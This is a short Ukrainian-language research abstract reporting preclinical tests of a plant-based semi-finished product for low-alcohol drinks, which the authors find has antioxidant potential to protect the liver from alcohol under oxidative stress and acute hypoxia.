Анотація

Досліджено антиоксидантні властивості напівфабрикату з рослинної сировини для слабоалкогольних напоїв в умовах оксидативного стресу та на моделі гострої гіпоксії під час доклінічних випробувань на біологічних об’єктах. Наведено результати, які підтверджують, що завдяки своєму складу напівфабрикат має антиоксидантний потенціал, здатний захистити печінку від негативного впливу алкоголю як у звичайних умовах, так і за умов посиленої оксидації організму.
